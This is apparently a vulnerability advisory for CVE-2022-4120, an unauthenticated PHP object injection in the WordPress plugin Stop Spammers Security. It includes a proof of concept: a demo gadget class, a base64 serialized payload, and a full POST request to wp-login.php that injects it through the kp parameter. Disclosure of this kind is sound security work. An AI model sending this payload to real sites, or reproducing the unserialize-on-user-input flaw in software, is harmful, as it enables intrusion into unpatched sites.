Stop Spammers Security < 2022.6 – Unauthenticated PHP Object Injection | CVE 2022-4120

Description

The plugin passes base64 encoded user input to the unserialize() PHP function when CAPTCHA are used as second challenge, which could lead to PHP Object injection if a plugin installed on the blog has a suitable gadget chain

Proof of Concept

To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

On a page where the request is blocked and the second challenge is set to a CAPTCHA (such as reCAPTCHA), send dummy data, intercept it and change the kp parameter with the following payload: Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};)


POST /wp-login.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 176
Connection: close
Upgrade-Insecure-Requests: 1

kn=6dc52e6b54&ss_block=G&kp=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D&kr=Allow+List+Email%3A+block%40email.com&ka=block%40email.com&ke=cwenf&km=cc&recaptcha=recaptcha&g-recaptcha-response=